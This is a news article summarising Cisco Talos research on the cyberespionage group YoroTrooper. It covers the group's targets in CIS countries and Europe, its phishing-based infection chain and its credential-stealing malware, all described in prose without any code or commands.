Since June 2022, a new threat actor named “YoroTrooper” has been conducting cyberespionage operations against governments and energy companies in CIS nations. According to Cisco Talos, the World Intellectual Property Organization (WIPO), several European embassies, and a crucial European Union body involved in healthcare have all had their accounts hacked.
The tools used by YoroTrooper are a mix of Python-based malware, remote access trojans, and common and customized information stealers. YoroTrooper is alleged to have stolen a significant amount of data from compromised endpoints, including cookies, browser history, and account credentials, according to Cisco Talos.
The infection spreads by phishing emails with malicious LNK files and fake PDF documents. Despite the fact that YoroTrooper employs malware linked to previous threat actors, such as PoetRAT and LodaRAT, Cisco’s analysts are confident that this is a new cluster of activity based on the evidence they have.
YoroTrooper Utilizing Common Malware
YoroTrooper used malformed PDF files delivered from email domains posing as Belarusian or Russian companies to target Belarusian entities in the summer of 2022. The organization experimented with VHDX-based dissemination of NET-based implants in September 2022 and registered a number of typosquatting websites impersonating Russian government entities.
The cyberspies turned their attention to Belarus and Azerbaijan in the months that followed until the end of the year, using a specially made Python-based implant they called “Stink Stealer.” Threat actors attacked the Tajikistan and Uzbek governments in 2023 by using HTA to download fake papers and implant dropper malware on the target’s machine.
In the most recent attacks, phishing emails with infected RAR or ZIP attachments offer enticements centered around international relations and national strategy. On the compromised system, the LNK files fetch and run remote HTA files using “mshta.exe,” which downloads a malicious executable and dumps the main payload. In order to avoid suspicion, a fake document is opened simultaneously.
Before YoroTrooper was seen utilizing common malware such as AveMaria (Warzone RAT) and LodaRAT, in later attacks, the threat actors resorted to employing unique Python RATs disguised as Nuitka. Nuitka makes it possible to deliver the payloads as stand-alone programs without having to install Python on the target device.
The customized RAT facilitates the execution of arbitrary commands on the infected device and uses Telegram for communication with command and control servers and data exfiltration. YoroTrooper used a Python-based stealer script in January 2023 to steal account credentials from Chrome web browsers and send them via a Telegram bot.
The attackers began disseminating the “Stink” credential thief in February 2023. Stink can take screenshots and steal data from Filezilla, Discord, and Telegram, as well as credentials, bookmarks, and browsing information from Chrome-based browsers. In addition, the hardware, operating system, and active processes are listed and exfiltrated.
On the infected machine, all stolen data is initially kept in a directory before being compressed and transferred to the threat actors. Using each Python module in its own distinct process and employing different processor threads to speed up the data collection process improves Stink’s performance.
In addition to the aforementioned, YoroTrooper has occasionally deployed C-based keyloggers and reverse shells built on Python. YoroTrooper’s sponsors or affiliations are unclear, and its genesis is unknown. However, the espionage threat group’s deployment of unique malware tools shows that they are skilled and educated threat actors.
Conclusion
According to a new study, a new hacker outfit has been conducting espionage on European nations and companies since June 2022. The new gang is known as “YoroTrooper” by Cisco’s Talos cybersecurity team, which claims it has already successfully infiltrated accounts linked to the World Intellectual Property Organization and an “important” healthcare organization in the European Union (WIPO). The researchers also discovered that it targeted a number of embassies since their victimology consists primarily of nations in the CIS [Commonwealth of Independent States], which includes nations like Azerbaijan, Kyrgyzstan, and Turkmenistan.
According to the researchers, the operators of this threat actor are likely Russian language speakers who do not necessarily live in Russia or are Russian nationals. In some of their implants, there are also fragments of Cyrillic, showing that the performer is conversant in the language. Also, the attackers occasionally aim their attacks toward Russian-speaking endpoints (using Code Page 866), which suggests that they focus on people who understand that language. The campaign’s aim is espionage, and the hackers are using malware to spread through widely visited CIS entities’ websites or create rogue domains of their own. Malicious shortcut files and fake PDF documents that are provided to targets in phishing emails can also corrupt victims.
